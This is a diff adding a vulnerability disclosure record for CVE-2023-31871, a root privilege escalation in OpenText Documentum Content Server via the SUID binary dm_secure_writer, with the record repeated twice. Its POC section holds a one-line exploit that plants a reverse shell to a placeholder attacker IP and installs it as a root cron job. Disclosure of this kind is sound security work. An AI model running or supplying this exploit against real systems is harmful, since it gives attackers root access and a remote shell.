picar0jsu · May 18, 2023 15:48
diff --git a/CVE-2023-31871 b/CVE-2023-31871
 [Suggested description]
 OpenText Documentum Content Server before 23.2 has a flaw that allows
 for privilege escalation from a non-privileged Documentum user to root.
 The software comes prepackaged with a root owned SUID binary
 dm_secure_writer. The binary has security controls in place preventing
 creation of a file in a non-owned directory, or as the root user.
 However, these controls can be carefully bypassed to allow for an
 arbitrary file write as root.

 ------------------------------------------

 [Vulnerability Type]
 Local Privilege Escalation via SetUID Binary

 ------------------------------------------

 [Vendor of Product]
 OpenText

 ------------------------------------------

 [Affected Product Code Base]
 Documentum Content Server - Before 23.2, Fixed in 23.2.

 ------------------------------------------

 [Affected Component]
 The affected SUID is dm_secure_writer.

 ------------------------------------------

 [Attack Type]
 Local

 ------------------------------------------

 [Impact Code execution]
 true

 ------------------------------------------

 [Impact Escalation of Privileges]
 true

 ------------------------------------------

 [Attack Vectors]
 Local access as the Documentum Content Server user to the machine with the affected software.

 ------------------------------------------

 [Reference]
 https://www.opentext.com/about/security-acknowledgements

 ------------------------------------------

 [Has vendor confirmed or acknowledged the vulnerability?]
 true

 ------------------------------------------

 [POC]
 ln -s /<Documentum Home>/dm_secure_writer /tmp/secure_writer; echo "bash -i >& /dev/tcp/<ATTACKER IP>/4444 0>&1">/tmp/test.sh; chmod +x /tmp/test.sh; echo "* * * * * root /tmp/test.sh" | /tmp/secure_writer test -1 /etc/cron.d/evilcron

 ------------------------------------------

 [Discoverer]
 @picar0jsu
	[Suggested description]
	OpenText Documentum Content Server before 23.2 has a flaw that allows
	for privilege escalation from a non-privileged Documentum user to root.
	The software comes prepackaged with a root owned SUID binary
	dm_secure_writer. The binary has security controls in place preventing
	creation of a file in a non-owned directory, or as the root user.
	However, these controls can be carefully bypassed to allow for an
	arbitrary file write as root.

	------------------------------------------

	[Vulnerability Type]
	Local Privilege Escalation via SetUID Binary

	------------------------------------------

	[Vendor of Product]
	OpenText

	------------------------------------------

	[Affected Product Code Base]
	Documentum Content Server - Before 23.2, Fixed in 23.2.

	------------------------------------------

	[Affected Component]
	The affected SUID is dm_secure_writer.

	------------------------------------------

	[Attack Type]
	Local

	------------------------------------------

	[Impact Code execution]
	true

	------------------------------------------

	[Impact Escalation of Privileges]
	true

	------------------------------------------

	[Attack Vectors]
	Local access as the Documentum Content Server user to the machine with the affected software.

	------------------------------------------

	[Reference]
	https://www.opentext.com/about/security-acknowledgements

	------------------------------------------

	[Has vendor confirmed or acknowledged the vulnerability?]
	true

	------------------------------------------

	[POC]
	ln -s /<Documentum Home>/dm_secure_writer /tmp/secure_writer; echo "bash -i >& /dev/tcp/<ATTACKER IP>/4444 0>&1">/tmp/test.sh; chmod +x /tmp/test.sh; echo "* * * * * root /tmp/test.sh" \| /tmp/secure_writer test -1 /etc/cron.d/evilcron

	------------------------------------------

	[Discoverer]
	@picar0jsu